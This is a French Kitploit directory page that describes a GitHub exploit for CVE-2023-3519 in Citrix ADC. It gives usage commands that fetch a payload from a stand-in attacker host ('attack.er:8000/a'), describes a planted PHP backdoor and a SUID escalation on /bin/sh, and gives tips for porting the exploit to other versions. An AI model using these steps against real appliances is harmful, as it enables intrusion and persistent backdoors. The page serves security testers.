Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3519 — Exploit Python pour CVE-2023-3519 ciblant Citrix ADC avec shellcode NASM personnalisé, déploiement de backdoor PHP et escalade de privilèges SUID. | Kitploit
Outils/GitHubGitHub/passwa11/cve-2023-3519
Analyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

Exploit Python pour CVE-2023-3519 ciblant Citrix ADC avec shellcode NASM personnalisé, déploiement de backdoor PHP et escalade de privilèges SUID.

Voir le dépôt
112il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Citrix ADC RCE CVE-2023-3519

Cet exploit utilise des adresses et du shellcode pour Citrix VPX 13.1-48.47. Pour l'article complet, cliquez ici.

Utilisation

NASM est nécessaire pour construire le shellcode.

root@kitploit:~
$ sudo apt install nasm

Le shellcode inclus téléchargera et exécutera un script shell depuis un serveur http(s) distant. Le script prend 3 arguments : l'hôte cible, le port cible et l'URL d'un payload de script shell. Un exemple de payload qui exécute id et uname -a avant de se nettoyer est inclus dans ce dépôt.

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

L'URL doit être suffisamment courte pour tenir dans le tampon du shellcode, et vous recevrez un avertissement si elle est trop longue.

Artefacts du shellcode

Le shellcode créera une backdoor PHP dans /var/netscaler/logon/a.php et mettra le bit SUID sur . Le payload inclus montre un exemple de nettoyage automatique de ces artefacts. Notez également que le shellcode ne ferme pas ses descripteurs de fichiers, donc une exploitation répétée excessive peut entraîner une épuisement des ressources.

/bin/sh
sh

Adaptation à d'autres versions

Pour les cibles Citrix basées sur FreeBSD, vous n'avez besoin que de trouver 3 valeurs : le décalage du pointeur de retour sauvegardé, un gadget ROP jmp rsp (ou quelque chose d'équivalent, comme push rsp; ret;), et l'adresse vers laquelle sauter pour éviter un crash. Ces paramètres sont tous codés en dur près du début de cve-2023-3519.py.

Télécharger l’outil